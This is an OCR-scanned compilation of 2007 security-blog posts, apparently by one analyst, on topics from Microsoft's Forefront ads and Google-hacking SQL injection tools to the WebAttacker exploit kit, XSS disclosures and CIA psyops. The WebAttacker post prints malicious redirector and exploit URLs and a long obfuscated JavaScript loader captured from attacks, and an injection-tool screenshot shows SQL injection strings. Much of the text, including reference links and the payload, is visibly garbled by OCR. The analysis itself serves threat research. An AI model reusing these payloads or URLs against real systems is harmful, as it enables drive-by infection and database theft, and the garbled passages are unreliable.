. http://ddanchev.blogspot .com/2006/08/steganography-and-cyber-terrorism.htm 


http: //ddanchev.blogspot.com/2007/05/sampling- jihadists-ips.htm 


http: //ddanchev. blogspot .com/2005/12/ip-cloaking-and-competitive htm 


. http: //www.steganos.com/ 


. http://www. proxyswitcher .com/ 
. http: //www.amplusnet .com/products/invisiblebrowsing/overview. htm 
. http://www.metasploit.com/research/misc/decloak/ 


. http: //www.hide-ip-soft.com/ 
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3.5.24 Microsoft’s Forefront Ad Campaign (2007-05-23 22:34) 


The introduction of Microsoft’s Forefront security solutions is already backed up by a huge ad 
campaign that can be seen on the majority of tech-news portals. The campaign is however 
lacking a consistent vision to communicate the benefits and main differentiation points - if 
any - of the product, and is barely informing that it exists in a [1]not so creative way : 


There’s nothing in Forefront that really makes it notably better or worse than any other 


solutions that are 


already in the marketplace. However, the Microsoft name may be sufficient for it to steal 
market share, 
863 


and a better integration with other 


Microsoft solutions...is likely to be a bit of a differentiator,” said Quin. Faced with increasing 
competition from Microsoft, Symantec Corp. questioned Microsoft’s ability to effectively 
protect enterprise customers. 


Trying to be witty too much while fighting ninjas and aliens often results in your ad cam- 
paign "clowning" in the eyes of a prospective customer. [2]Security is indeed[3] a cosmic 
phenomenon for Microsoft, an unexplained pseudo-randomly generated event that’s continu- 
ing [4]to be researched and analyzed for generations to come. [5]Can they achieve desirable 
results? Will [6]penetration pricing help? And will the ad agency that got commisioned with the 
ad campaign come up with a bit of [7]a more creative psychological imagination the next time? 


A pure example of an [8]Jacquisition-to-[9]solution strategy compared to [10]AOLs licensing 
of a reputable AV vendor’s technology, in order for them to [11]Jenter the market segment as 
well. 


http: //www.itbusiness.ca/it/client/en/home/News .asp?id=43360 
http://www.eweek.com/article2/0, 1759, 2132724, 00. asp?kc=EWRSS03129TX1K0000614 
http: //it.slashdot.org/article.p1l?sid=07/05/08/1226243kfrom=rss 


. http://www. channelregister.co.uk/2007/05/03/ms_forefront/ 


http: //ddanchev. blogspot .com/2006/05/microsoft-in-information-security.htm 


http: //ddanchev. blogspot .com/2006/08/microsofts-onecare-penetration-pricing.htm 


http: //ddanchev. blogspot .com/2007/02/beyond-traditional-advertising-packages .htm 


. http: //www.microsoft.com/presspass/press/2003/jun03/06- 10GeCadPR.mspx 
. http: //www.microsoft.com/presspass/press/2005/feb05/02-08sybaripr .mspx 


. http: //ddanchev.blogspot .com/2006/06/brace- yourself-aol-to-enter-security_09.htm 


11. http: //wwiw.ecommercetimes.com/story/52290 .htm 
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3.5.25 Google Hacking for Vulnerabilities (2007-05-29 12:31) 


«} Google Links Extractor (Special build for ) Lad O & 


SQL Injection Query Builder Attack victim Debug with internal browser{*] | Search Deburg(*] | 


productDisplay. asp 
Type pour query into 

Search Engines : Exploit Code : the text box (Example : 

Sa ; | productdisplay. asp) or 
» eine -ExploitPages A hie ttom the Expleit 
eee nie .asp?book|ID= code list beside then 
() Mamma -asp?cart= choose your Search 
(| MSN _asp?cartlD= Engines and press the 
.asp?catalogid= GET button to retrieve 
_asp?category_list= search result from them. 
-asp?CategorID= 
-asp?catlD= 


Tools like these are a clear indication in the interest of gathering targets through google 
hacking techniques and SQL injecting them using a single tool. What’s important to note is 
that, instead of scanning the target’s web server in an automated fashion thus, increasing 
the potential of detecting your malicious requests in this case the attack vectors are already 
known even cached on a search engines’ servers. Perhaps a good time to set up a [l]google 
hacking or [2]PHP deception honeypot, make sure google crawls it and either gather first hand 
statistics, or deceive at your best. A paper released under the [3]Know Your Enemy series 
comments on the concept of search engines’ reconnaissance : 


"Below we give the exploits we have seen against our honeypots and where possible an esti- 
mate of the 


number of users for each piece of software. The estimates are obtained by checking the num- 
ber of Google search results returned for a given page in a website, for example searching for 
“powered by PHPBB" inurl:viewtopic.php’ suggests there are around 1.5 million installations 
of PHPBB indexed by Google." 


Malware using search engines to build its hit lists is nothing new and it’s the [4]Santy 
worm and perhaps even the [5]JS/Yamanner worm | have in mind. Worms like these are 
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© SOL Injection Tool (Special build for J 


| | 
Attacker | Exploid Code | 


© union select 1 from | orders 


© Union SELECT name FROM sysobjects WHERE xtype =U" 


Error Msg : 


Query data: [“]FullResur (Export) 


just the tip of the iceberg when it comes to malware because their successful intrusions act 
as a propagation vector for malware exes, exploits embedded pages, and hosting of phishing 
sites. In case you remember, over an year ago New Zealand started [6]a nation wide google 
hacking security audit aiming to not just build awareness on the potential security issues, but 
to also, measure the country’s susceptibility to google hacking which they claim is the highest 
in the world. If you don’t take care of your web application vulnerabilities someone else will, 
and your organization wouldn’t even have "the privilege" of getting exploited by an advanced 
attacker, but by a script kiddie making your server open a reverse shell back to them in between 
[7]everything else. 


1. ips //gih, sourceforge not] 

2, http: //www.rstack.org/phphop/ 

3. ittps/Mmonayact.ony/papers/ webapp] 

4, http: //uwy.theregister co. uk/2004/12/24/santy_worw/ 
5 

6 

7 


. http: //ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm.htm 


. http: //ddanchev. blogspot .com/2006/05/nation-wide-google-hacking-initiative.htm 


. http: //ddanchev. blogspot .com/2007/04/compilation-of-web-backdoors .htm 
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3.5.26 Phrack Magazine’s Latest Issue (2007-05-29 16:49) 


Phrack is back believe it or not with its [1]latest Issue 64 released two days ago. The style is 
still so old-school, so authentic it makes you remember extraordinary Web 1.0 experiences. 
Articles of notice | went through so far : "[2]A brief history of the Underground scene" ; 
"[3]Blind TCP/IP hijacking is still alive" ; and "[4]The art of Exploitation: come back on an 
exploit". Dazzling already : 


"In the last decade, Phrack took a very annoying industry-oriented editorial policy and 
the original spirit was in our opinion not respected. The good old school spirit as we like 
had somehow disappeared from the process of creating the magazine. That is why the 
underground got split with a major dispute, as some part of the scene was unhappy with this 
new way of publishing. We clearly needed to bring together again all the relevant parties 
around the spirit of hacking and the values that make the Underground. The Underground 
is neither about making the industry richer by publishing exploits or Oday information, nor 
distributing hacklogs of whitehats on the Internet, but to go further the limits of technology 
ever and ever, in a big wave of learning and sharing with the people ready to embrace it. This 
is not our war to fight peoples doing this for money but we have to clearly show our difference. 


1. http://www. phrack.org/issues.html?issue=64 


2. http://www.phrack.org/issues .html?issue=64k%id=4#article 


3. http://www.phrack.org/issues .html?issue=64u%id=15#article 
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4. http://www.phrack.org/issues.html?issue=64%id=13#article 


3.5.27 Reverse Engineering the ANI Vulnerability (2007-05-30 01:31) 


Informative video analyzing the [1]JANI cursor vulnerability, part of the Google TechTalks series. 
" Alex Sotirov is a vulnerability engineer at determina. He will discuss some latest tech- 


niques in reverse engineering software to find vulnerabilities. Particularly, he’ll discuss his 
technique that lead him to find the ANI bug (a critical new bug in WinXP and Vista). " 


[EMBED] 
1. http: //www.microsoft.com/technet/security/advisory/935423 .mspx 


3.5.28 The Revenge of the Waitress (2007-05-30 12:44) 


vm Tube) 


@ | share 


Think your scrooge tips will achieve their effect? Think twice but don’t put the emphasis on 
underpaid waitresses, rather on the overall availability of [L]credit card data reading devices 
as well as their vulnerability to such readers. Here’s [2]a video of another waitress clonning 
credit cards on the fly : 


" A telltale clue that helped the restaurant and investigators zero in on the waitress: She 
would make quick visits to the restroom after picking up customers’ charge cards, apparently 
to swipe them through a palm-sized device that recorded the confidential numbers. " 


1. http: //www.latimes.com/technology/la-me-waitress22may22, 1,6787157 .story?track=rsskctrack=1&cset=true 


2. http: //ddanchev. blogspot .com/2007/02/credit-card-data-cloning-tactic. html 
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3.5.29 The WebAttacker in Action (2007-05-30 21:06) 


HTTP/1,1 302 Found 

Date: Wed, 30 May 2007 18:43:17 GMT 

Server: Apache/1.3.37 (Unix) mod_ssi/2.8.26 OpenSSLj/0.9.8d PHP/4.4.6 
X-Powered-By: PHP/4.4.6 


Location: http://xorry.org/backup/atds/out.php?s_id=1 
Connection: close 

Transfer-Encoding: chunked 

Content-Type: text/html; charset=windows-1251 


HTTP/1.1 302 

Date: Wed, 30 May 2007 17:23:16 GMT 

Server: Apache 

X-Powered-By: PHP/4.4.0 

Set-Cookie: advtds_last_urls=4; expires=Wed, 30 May 2007 19:59:59 GMT 
Location: http://greencunt.org/crapsindex.php 

Transfer-Encoding: chunked 

Content-Type: text/html; charsetmwindows-1251 


HTTP/1,1 200 OK 

Date: Thu, 31 May 2007 02:23:08 GMT 
Server: Apache/2.2.4 (Fedora) 
X-Powered-By: PHP/S.1.6 
Transfer-Encoding: chunked 
Content-Type: text/html 


<Script Lanquage='JavaScript’ >document.virtet unescape("%3C%73%63 72% 


Interesting to see that the [1]WebAttacker kit can still be seen in the wild. Here are the 
redirectors in action : 


Input URL : _http://rulife.info/traffic/go.php?sid=1 
Effective URL: _http://greencunt.org/crap/index.php 
Responding IP : 203.223.159.110 

Name Lookup Time: 1.290261 


Total Retrieval Time : 5.987628 


=> _http://rulife.info/traffic/go.php?sid=1 
=> _http://xorry.org/backup/atds/out.php?s _id=1 
=> _ http://greencunt.org/crap/index.php 


What follows is the (Ssandboxed) infection : file: Write C:\Program Files\Internet Ex- 
plorer\IEXPLORE.EXE -> C:\sysykiz.exe 


Several more URLs are to be found at the "green" domain as well : 


_ http://greencunt.org/anna/fout. php 
_ http://greencunt.org/spl1/index.php 
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Despite that the tool is outdated compared to mature malware platforms and exploitation kits 


which I'll be covering in upcoming posts, the leak 


<Script Language=" JavaScript‘ >document -write( 

unescape ( '%30%73%63%72%69%7 6%7 4Z3E%OD% GN%66%7 5%6E%63%7 446 9Z6F Z6E%2 04 7NS58%2847 3%29%OD% OAS 
%76%61%7 2%2 647 3%31%3D%7 5%6E%65%73%63%6 147 8465%28%2 047 342E%73%75%6 247347 447 2%28%3 O42047 B42 
6E%67%7 4268%20%31%29%2923B%2 8% BDZ BAZ 7 626 1%7 242 B47 4Z3D%27%2 7Z3B%66Z6F 47 242846943043 B43B 269% 
1%2E%60%65%6E%6 7%7 4%68%3B%69%2B%2B429%2 847 4Z2B%3D%5 347 NS? 246 9Z6ES6 74 2E466%7 246F ZOD SHS ZO BS 
%6F%64%65%28%7 343 1%2E%63%68%6 147 2543%6 F 64S6 564 1%7 4%28%6 9%29%2D%7 3S2E G7 9%7 546247 347 NST 2% 24 
60%65%6E%67%7 4Z68%2D%3 122043 1%29%29%3B%2 8% BDZ BN%6 NZ6F 463%7 526D%6 5 Z6ES7 NZ2ES7 7%? 226 9%7 NZ654 
E%65%73%63%61%7 0265%28%7 4%29%2 9%3B%2 027D%OD%Z GAZ3C%2F2Z73%63%7 2%69%7 OZ7US3E * )) 5 

2X ( ' S2A8HxhwnuyS2A75qFS1ZF1j%2A8 LOFS7 BFXNwnuysZ2A8JKZShyNtsZ2A75iN%2A7S3D%7D%2A7 S3ES2AS3CG4 
75q%2A81%7D3q j slym%2A7HNS2ATHOS2ATHWS2ATHGS2ABI%2A7%ID759SBD%2A7K7S2ATSIES2LATHUS2ABISS2ATI 
S2ATHS7CZ2ABISS2ATHS2ATSYS2AB IF wwFS7EZ2A7S3IDS3BBS2A 7HGS%Z2A7H7S3AZ2A7HSZ2ATHISSDSZAATHIOSSES: 
A7H79%2A7H6%2A7H68S2N7H5Z2A7H5Z2A7H5Z2A7H5S2A 7H5S2A7HSS2A7H7 7 S27 HZSB7S2A7H9S2A7HB9SZ2A7HSA 
7%3C0%2A7HZ3ASICS2A7HB5%2A7H743E%2A7H7 BS2A7TH7SZ2A7HS3D%2A7HBS2A7H6%3D%2A7 HISSIBS2ZA7H7S3BS2A7E 
99%2ATH%3AZIBS2A7HES3ES2AN7THSSZIAS2ATHIS3CS2A7HSINGS2A7HBG%2A7HS3C%2ATH7SS2A7THSSASZIDS2ATHS 2 
THSZ2A7HSZ2A7TH76Z2A7HSZ2ATHSZ3DZ2A7THZ3ASS2A7THG7Z2ATHOSSASZ2ATHO7SZ2A7THSSBSZ2ATHSZSEZ2A7HSS3BS 
S2ATHISS2AATHSSASSESZA7HSIABS2A THSSASSASZA7HSZIESZA 7 HSSASG2ZA 7HOS3CS2A7HSSBOSZ2A7HSIBSS2A7 HBS 
%3BS2A7HB7%2A7HS3A7S2A7HG9S2A7TH7%3D%2A7HIBS2A7HIGS2A 756207 S3ES2ABCK CWS2A7%3D0%2AB1%2A7 SRFL 
2A7%3DG%2A7KGS2A7S3ES2ABCOS2AB ISZ2ABCO22%2A7ZIES2ASICGWS2AB I S2A7SICS2ATSICS2ASES2A7SKt wee 
ASIRFyum3rnsZ2A7%3Dqs2A7HGZ2A7S3ES2ASENS2AB ISZ2ABGCS2A7S%2A7 SN22%2A7HG22%2A 7 SSES2ASICES7 CZ 
81%2A7%3DYy%2AZ3AGSZ2A75%7D3hmF wht jFys2A7%3DusZ2A7GZ2A7G%2A7Z3E29S3DZ2AS3A 1 Z2A7S3ES2ABHS2ABE 
k%2A7%3Dx%2A7S%3ES2ASICGWS2A7 GS2AB I Xywns1l3kwtrHmFwhti j%2A7%3D 743D%2AS3AIS7CZ2A7SIB/S3ASING: 
ASCZ7CSZ2ABIZ2AB IZ2NB 1 Z3DZ2ASEx2Z2AB | 7Z2AZ3C I j qx jS2AS3CGExZ2A8 I Z3BS2AZ3C 1 Z2AZ3C lithzr jsy3z7l 
7Z3DWSAATSZ2A7TSSESZ2ASIC IZ2AS3C LiNS2A7Z3DS2A7 7 wGUCZH| TKukT yKZ2A9SL vLOPS7BUZ2AISZ7DILRGSZ2A9E 
DLHGUt22%2A95Mo%3DNLHSghod%5D 19 IsPus3CZ3DPZusJqe3Ak T w8NSSCGINT VINLUWxdus7F%2A95Z5CVus Iqeat 
2A9SGUt j qSIWGNLZ3A%3EsJ1%3AXP wPNL%7ESSAXNSKS2AVSSSC LuXS3EsGUt j qs JwGNL%3A%3EML 9qrL wGOYU%7 DE 
Ut_IFZ7D5UZ2A9SMZSB1Z5DYZ7BqsT qIrLZ7BZ5EQYsZ3AXZ7 DK trZ7DSdZ2A9SPZ3A ING? DZSBKZ2A957S9Z5BJKL 
SBI kKT%7BWQMUS7FZ2A9SMgi S5DS3E quQhwWOZ3BUIRSZ3ESOXS3CussCuGSZ2A9SONT guZsD I qz3Es%7 DwUNLouG JSqt 
WIZSDS3EZR3AF JudnX9dZSDLKZ3DQYZE3AF JudnX9dZ5DLKUSZSEMF INSZ3EuS3CZ3A7ussCutS7EUNMS 1Z5DV%7 Buk. 
DNMWISh9IsZ7DpUkKMNWOPZZ3AF JudnX9dZ5DLKuZSEMF INZ3EuZ3CutsukJSGN7YZ3DNMWIZ5DYrGOYZ2Z3AF Judnxs 
RZ38CuSSCUCS2AISZSESSAIUKZ2A95SZ5C I uGS7 DQUNL wGOYZ2Z3AF JudnX9dZ5DLK1Z5BJ%7F Kr JOKZ2A9SMgi Z5DZ3E 
KR2ZPAOSLEL TRS 7 Nalini Vdc PKVAF vz ARAY7NRLZPAVGSEF LMU PAOST C1 ZENY7ZAAE. hein XGAZGN! KMRLZPAIELA Me 


of its source code made it easy for someone to tweak it for their personal needs and simply 
feed with undetectable binaries, new vulnerabilities, and newly registered domains - even 
hijacked ones through web application vulnerabilities for instance. 


In case you're interested in a proof that attackers are still successfully infecting victims 
by using vulnerabilities for which patches have been released months ago, here’s another URL 


that’s exploiting two vulnerabilities at once namely : 


MDAC ActiveX code execution (CVE-2006-0003) 
IE COM CreateObject Code Execution (MS06-042) 


The domain in question is - 
http://www.avvcc.com/lineage/djyx.htm 


Related posts: 


[2]RootLauncher Kit 

[3]Nuclear Grabber Kit 

[4]Shots from the Malicious Wild West - Sample Seven 
[5]Shots from the Malicious Wild West - Sample Six 
[6]Shots from the Malicious Wild West - Sample Five 
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http://www.avvcc.com and 


[7]Shots from the Malicious Wild West - Sample Four 
[8]Shots from the Malicious Wild West - Sample Three 
[9]Shots from the Malicious Wild West - Sample Two 
[10]Shots from the Malicious Wild West - Sample One 


http://4.bp.blogspot .com/_wICHhTiQmrA/Rd4wewiIS9I/AAAAAAAAASw/dfai0Vk9ZuI/s200/webattacker . jpg 
. http: //ddanchev. blogspot. com/2007/02/rootlauncher-kit .html 

. http: //ddanchev.blogspot.com/2006/11/nuclear-grabber-toolkit.html 

http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_25.html 

. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm1 

. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.html1 

http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample. html 

. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_3723.html 

. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_10.html1 

10. http://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample html 


3.5.30 MSN Spamming Bot (2007-05-31 21:20) 


A A d 


An image is sometimes worth a thousand words. This is a screenshot of infected bots spreading 
spam messages at MSN via typical !spam [1]IRC based command and control. And here’s a 
related article about [2]malware on IM networks as well: 


"It is not clear exactly why the number of IM attacks is increasing, but security researchers 
have their theories. Don Montgomery, vice president of marketing at Akonix, speculated 
the increase in the number of attacks reflects the increase in the use of instant messaging, 
particularly on corporate networks. 


"IM is becoming favored over e-mail as a distribution vector for malware as a result of e-mail 
security now 
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being employed by 75 percent or more of companies, while IM security is only employed by 
15 to 20 percent of companies ," Montgomery said. "The hackers are simply turning to the 
open door. " 


Two options remain highly lucrative. Either someone’s spamming p3n1 $ 


2500 Monthly View | Quarterly View | Yearly View 


IM yvorms are the driving force behind this spike. These 


threats are particularl, to propagate and mutate 
making them an attractive option for malyvvare authors. 


—r 


_ 


enlargement propositions and directing to a spam site, or the [3]social engineering efforts 
aim at visiting an exploit hosting site. No more direct .pif; .scr; or .exe propositions in plain 
simple text, what’s exploited is mostly client side vulnerabilities and redirectors to break the 
ice. [4]IM threats stats courtesy of Symantec’s IMlogic and here’s a related post regarding 
[5]the acquisition of the company with Symantec anticipating the emergence of this market 
segment and investing in it. IM propagation has it cyclical patterns which like pretty much all 
other propagation vectors reaching a mature level starts getting at least partly replaced by 
other ways of propagation. 


1. http: //ddanchev. blogspot .com/2007/03/botnet- communication-platforms.htm 


2. http: //www.eweek.com/article2/0, 1759, 2138921, 00.asp?kc=EWRSS03129TX1K0000614 


3. http: //ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 
4. http://tc.imlogic.com/threatcenterportal/pubIframe. aspx 


3.6 June 


3.6.1 Data Breach Sample Letters of Notification (2007-06-04 15:15) 


Affac 


AFLAC-20060118-01 AFLAC-20060113-02 AFLAC-20060118-03 AdvPainCare-20060125-01 
June 5, 2006 22:46:46 June 5, 2006 22:46:44 June 5, 2006 22:46:42 June 5, 2006 22:42:17 


Dear customer, to ensure your satisfaction with our quality services we’re notifying you that 
our inability to protect your sensitive data has resulted in its leakage on the World Wide Web 
thus, stay tuned for possible identity theft and spending the next couple of years explaining 
how it wasn’t you who bought that luxurious yacht your bank wants you to pay for. By the time 
our stolen laptops get connected to the Internet - which we doubt anyway - they will phone 
back helping us locate them which doesn’t mean we didn’t breach the confidentiality of your 
personal information, and are just trying to be socially responsible in the time of notification. 


Sincerely, 
Your favorite and customer-friendly breached retailer 


Perhaps the most comprehensive [l]archive of scanned data breach letters of notifica- 
tion on U.S based companies, I’ve come across to so far. Well worth going through in case you 
wonder on what tone does a breached company use to maintain its weakened brand image, 
and to prevent a PR disaster. 


Related posts: 


[2]To report, or not to report? 
[3]Personal Data Security Breaches - 2000/2005 
[4]A Chart of Personal Data Security Breaches 2005-2006 
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[5]Getting paid for getting hacked 


http: //www.cwalsh.org/BreachInfo/primary_sources/ 


1. : F i 

2 

3: 
4. 

5. 


http: //ddanchev. blogspot .com/2006/11/chart-of-personal-data-security.htm 


ttp://ddanchev. blogspot .com/2006/03/getting-paid-for-getting-hacked_17.htm 


3.6.2 gOt XSSed? (2007-06-04 15:48) 


31/05/07 Hotpockets www.bravo.ca %& XM 619785 xSS 
31/05/07 The_Flash www.familyguy.com *% A 2018 xSS 
31/05/07 The_Flash www.kia.co.uk *& XM 91722 xSS 
31/05/07 St@rExT WWW.canada.com *& M 1366 xSS 
31/05/07 Hotpockets search.sportsnet.ca *& M 11692 xSS 
31/05/07 The_Flash Www.evertonfc.com %& MX 27938 xSS 
31/05/07 Hotpockets www.tiaca.org *& MM 1501165 xSS 
31/05/07 Hotpockets search.cityguide.aol.com *% M55 xSS 
31/05/07 Sid www.habbo.co.uk %& MA 17350 xSS 
31/05/07 The_Flash WWW.aiu.com w& MX 815917 xSS 
31/05/07 Cyber Don www.shorturl.com *& MXM 7519 xSS 
31/05/07 Hotpockets www.grants.ord.sa.gov.au %& MX 19381 xSS 
31/05/07 Hotpockets www.hecb.wa.gov %& XM 5272 xSS 
31/05/07 Hotpockets www.imperial.ac.uk *%& MX 29929 xSS 
31/05/07 Hotpockets www.essex-fire.gov.uk *& M 461136 xSS 
31/05/07 Hotpockets www.eho.wa.gov %& MX 5272 xSS 
31/05/07 MaXWeL soccernet.espn.go.com *& XM 45 xSS 
31/05/07 Hotpockets images.snap.com % XM 2410 xSS 
30/05/07 142TeeTH thepiratebay.org R *& M 305 xSS 
30/05/07 142TeeTH secondlife.com %& M 1501 xSS 


Following previous posts on [1]XSSing The Planet and [2]XSS Vulnerabilities in E-banking 
Sites, here’s a full disclosure project that’s basically [3]categorizing user-submitted XSS 
vulnerabilities by pagerank/government/public entity, with mirrored XSSed pages. 


Even a .secured TLD name is nothing more than [4]a false feeling of security with phishers still 
loading content from E-banking providers’ sites, and actively exploiting XSS vulnerabilities to 
make their scams use the bank’s site. Therefore from a business development perspective 
you ought to realize that [5]overperforming in a developing [6]market segment, is sometimes 
more profitable than being a pioneer with an idea the market’s not willing to anticipate for the 
time being - perhaps for the best. 


1. http: //ddanchev. blogspot .com/2007/05/xss-planet .htm 


2. http: //ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


3. http: //xssed.com/archive/special=1/ 


. http://ddanchev.blogspot.com/2007/03/take-this-malicious-site-down.htm 


. http: //ddanchev.blogspot .com/2007/04/taking-down-phishing-sites-business. htm 


3.6.3 CIA’s "Upcoming" Black Ops Against Iran (2007-06-06 13:37) 


Recent articles pointing out on a U.S President Bush’s [1]clearance for CIA black operations 
against Iran, make it sound like it’s something the CIA haven’t been doing for decades already. 
Here’s an example of a spy thriller in real life on how the [2]CIA helped U.S embassy workers 
escape the country unharmed during Iran’s revolution by using a fake sci-fi movie production 
as an excuse : 


"He was stuck. For about a week, no one in Washington or Ottawa could invent a reason for 
anyone to be in Tehran. Then Mendez hit upon an unusual but strangely credible plan: He’d 
become Kevin Costa Harkins, an Irish film producer leading his preproduction crew through 
Iran to do some location scouting for a big-budget Hollywood epic. Mendez had contacts in 
Hollywood from past collaborations. (After all, they were in the same business of creating 
false realities.) And it wouldn’t be surprising, Mendez thought, that a handful of eccentrics 
from Tinseltown might be oblivious to the political situation in revolutionary Iran. The Iranian 
government, incredibly, was trying to encourage international business in the country. They 
needed the hard currency, and a film production could mean millions of US dollars. " 
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Today’s active black ops doctrine isn’t hapenning without [3]lran taking notice of course 


" Other Iranian Americans also have been prohibited from leaving Iran in recent months, 
including Parnaz Azima, a journalist for the U.S.-funded Radio Farda; Ali Shakeri, a founding 
board member of the Center for Citizen Peacebuilding at the University of California, Irvine; 
and Kian Tajbakhsh, consultant working for George Soros’ Open Society Institute. " 


Realizing the U.S’s inability to wage conventional war on yet another front - from a PR 
point of view not lack of capacity - the CIA is logically putting more efforts into under- 
mining a religious regime where it hurts most - Iran’s overall isolation from the world’s 
economic markets and a fact with which no one from the international community is feeling 
comfortable with, namely, [4]lran’s continuing efforts to supply the enemies - [5]Hezbollah 
- of its enemies - the U.S - with technology and know how that was supposedly hard to acquire. 


Capitalism has the power to undermine any regime except perhaps one whose founda- 
tions are purely religious such as with Islam, therefore dirty tricks like the ones fabricating 
evidence and making the average Iranian perceive its current rulers as a corrupt puppets 
of behind a power-driven vision, seems to be a way of destabilizing the regime. Another 
recent example of an unamed intelligence agency’s PSYOPS team aiming to a achieve a 
disorted media-echo by distributing false rumors and relying on that basis that there’s truth 
in every rumour, was that of [6]Muammar Gaddafi’s coma speculations that quickly spread 
around the world. But what was the purpose of this hoax? Let’s clarify - to achieve a media 
echo effect abusing the mainstream media’s major weakness in respect to always trying 
to be the first to spread a ground breaking event. What did the colonel do once he found 
out he was in a come? Instead of ignoring, he fell victim into an even more well-thought 
of trap, and responded that the’ll sue the news agency that came up with the hoax, thus, 
achieving an even more sucessful media echo effect. If you want to destroy a regime, you 
destroy it from inside-to-outside, not the other way around and perhaps the key objective of 
this PSYOPS was to help the regime’s citizen’s envision a future without their leader, even 
for a few hours before the fact is once again on the front pages. Ingenious intelligence thinking. 


[7]PSYOPS and BLACKOPS intersect and these are among the many practial examples | 
pointed out in a previous post : 


- your [8]web sites spread messages of your enemies 

- [9]sms messages and your voice mail say you’re about to lose the war 

- your fancy military email account is inaccessible due to [10]info-warriors utilizing the power 
of the masses, thus script kiddies to distract the attention 

- you [11]gain participation, thus support 

- you feel like Johnny Mnemonic taking the elevator to pick up the 320 GB of R &D data when 
a [12]guerilla info-warrior appears on the screen and wakes you up on your current stage of 
brainwashing 

- starting from the basics that the only way to [13]ruin a socialist type of government is to 
introduce its citizens to the joys of capitalism - it always works 

- [14]hacktivism - traffic acquisition plus undermining confidence 

- propaganda - [15]North Korea is quite experienced 

- self-serving news items, commissioned ones 

- achieving Internet echo as a primary objective 
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- introducing biased exclusiveness 
- stating primary objectives as facts that have already happened 
- impersonation 


tap: /Pologsabeness on/theb otter 2007/06 bush_authorizes all 

ep: / eee vied, con/ired/arcuive/16.06/teat cia. neel 
_hvtp://swy.voanews.con/english/200T-05-30-vou80 cf 

_hvtp://adanchey. blogspot. cou/2007/0/ransferring-sensitive-ailitary hall 

. http: //ddanchev. blogspot. com/2006/09/hezbol lahs-use- of -unmanned- aerial . html 
ttp://www.dailymail.co.uk/pages/live/articles/news/worldnews.html?in_article_id=454828%in_page_id=1811 
Ee arate elses con 000/00 ceca _paopepoyecciogical tal 

_hvtp://w ato, int /docu/revies/2001/0104-04 hin 

_ ep: /ave-boingving. not /2006 /01/26/ieraat_ using pas roe Wea 


ttp://www.boingboing .net/2006/07/18/image_of_the_day_chi.htm 


http: //www.theage.com.au/news/technology/israel-hacks- into-hezbollah-tv-radio/2006/08/02/1154198175078. 


13. http://cryptome.org/invent-intel .htm 


14. http://ddanchev. blogspot .com/2006/02/hacktivism-tensions.htm 
15. http://ddanchev. blogspot .com/2006/08/north-koreas-strategic-developments.htm 


3.6.4 Security Cartoons (2007-06-06 13:47) 


spoofing malware phishing pharming passwords fightback View All 


Despite that the main goal of the initiative is to build better awareness among the average 
Internet user through [1]security cartoons, it’s also very entertaining for someone profession- 
ally in the field. The original [2]press release : 


" The cartoons we have developed obviously are not a textbook approach, not made for 
professional journals or geared to an audience of professional researchers," said Srikwan, who 
is the graphic designer of [3] www.SecurityCartoon.com 


"We wanted this to be accessible to anyone who uses the Internet - general consumers, 
teenagers, teachers and anybody who banks or shops online. That’s why the cartoon format 
is perfect - everybody can relate to it. The cartoons cover online security issues such as 
phishing, pharming, malware, spoofing and password protection. But as opposed to most 
other educational efforts relating to these topics, the cartoons do not only teach its readers 
what to do and not to do, but why, too. " 


Is [4]building security awareness in the age of malicious economies of scale worth the 
investment in terms of outsourcing the program details to an experienced vendor? You bet, 
and what | especially like about the cartoons collection is its vendor-independent position, 
namely it’s not promoting the idea of the product concept myopia and product as the solution 
to the threat, but vigilance and maintaining a decent situational awareness while online. 
The rest is up to a vendor’s marketing and sales department trying to hopefully get more 


877 


customers and prove their solution outperforms the rest of the vendors, compared to a 
profit-margin centered vendor, trying to squeeze out the juice from a commoditized product 
or a solution but lacking any major differentiation points. 


Here are [5]two more great collections of [6]security cartoons as well. 


. http://securitycartoon.com/ 
http://newsinfo.iu.edu/news/page/normal/5765. html 
http: //www.securitycartoon.com/ 

http: //security.isu.edu/pdf/security-policy. pdf 


http: //www.packetstormsecurity.org/unix-humor/indexdate.html 
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http: //www.networkintrusion.co.uk/cartoons.htm 


3.6.5 An Analysis of the Technical Mujahid - Issue Two (2007-06-07 13:41) 
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Good afternoon everyone, shall we enjoy some fried cyber jihadists for lunch? I'd say let’s 
go for it. After [l]lanalyzing issue one of the Technical Mujahid couple of months ago, the 
post continues to be among the most popular ones at this blog, and best of all - I’ve virtually 
met with people whose knowledge intimacy I’d never ruin by physically meeting with them. 
In a globalized world, OSINT is your early warning system and a tool for establishing social 
responsibility as a citizen of world, and I’m still sticking to my old saying that an OSINT 
conducted - a tax payer’s buck saved somewhere. 


During March, 2007, the Al Fajr Information Center released the second issue of the Technical 
Mujahid E-zine (72 pages), a definite proof of their commitment towards educating the 
prone to brainwashing and radicalization wannabe jihadists. What has improved? Have the 
topics shifted from the general IT ones to start covering conventional weaponry discussions? 
Disturbingly yes. Whereas the topics still largely remain IT related, much more PSYOPS and 
discussion on weapons systems such as MANPADS- is included in the second issue. The myth 
of terrorists and jihadists using steganography is "thankfully" coming out of the dark despite 
how uncomfortable you may feel about it, from a strategic point of view, the low lifes are 
putting more efforts into educating the average jihadist on how to generate noise, so that the 
real conversation can continue with wannabe jihadists getting caught, and the true master 
minds remaining safe. 
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Case in point - the first issue of the magazine was covered by the several sources who 
seem to be aware of the forums where the real discussion and announcements are going, 
but the release of the second issue wasn’t that well covered in comparison to their previous 
coverages. But how come? Is someone interested in getting a higher proportion of the 
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upcoming departamental budget allocation with stories like we need petabytes of disk space 
and CPU on demand to analyze the ongoing conversations, or is the average citizen feeling 
more secure not knowing how aware both cyber and real life jihadists are? A picture is 
sometimes worth a thousand fears. Let’s discuss the second issue of the Technical Mujahid by 
starting with the key summary points : 


Key summary points : 


Repl fae case ol ales geal (ists Nya tea yall a ; 


4} 
iid 


Ui yall ores os cs 
